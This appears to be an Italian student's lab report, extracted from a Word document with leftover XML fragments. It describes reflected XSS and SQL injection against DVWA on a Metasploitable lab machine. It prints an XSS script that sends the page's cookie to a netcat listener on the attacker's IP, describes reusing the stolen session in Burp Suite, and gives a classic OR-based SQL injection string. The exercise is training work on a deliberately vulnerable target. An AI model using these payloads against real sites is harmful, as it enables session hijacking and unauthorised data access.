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Report XSS e SQL injection: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XSS reflected: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prima collegato sulla stessa rete la mia macchina Kali con la Metaspoitable, successivamente ho visto gli ip e fatti pingare tra di loro. A seguire ho inserito l’ip della metaspoitable su firefox e andata su DVWA. Ho settato la sicurezza a LOW.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0588" cy="342175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42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mentre da terminale ho messo netcat in ascolto nella porta 8888. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Sono andata ad inserire successivamente nell input di XSS reflected lo script:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ciao&lt;script&gt; var i=new Image();i.src=”http//192.168.50.100:8888?d=”+document.cookie&lt;/script&gt;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">e questo è stato il risultato da netcat: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2963" cy="28876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88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Aprendo poi il tool Burpsuite sono andata ad intercettare i movimenti e apponendo poi il codice dato dalla manomissione XSS (il codice in highlight sopra) sono riuscita a riaprire da Kali la pagina senza bisogno di entrare con le credenziali della metaspoitable.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31871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187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Injection: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Provando ad inserire un numero nell’input user id vedo che mi restituisce un nome ed un cognome, di conseguenza ho provato ad inserire la seguente query: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1ʼ OR ‘1ʼ=‘1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avuto l’effetto desiderato, ovvero che il database mi ha ridato tutti i risultati per la query richiesta. </w:t>
        <w:br w:type="textWrapping"/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305717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057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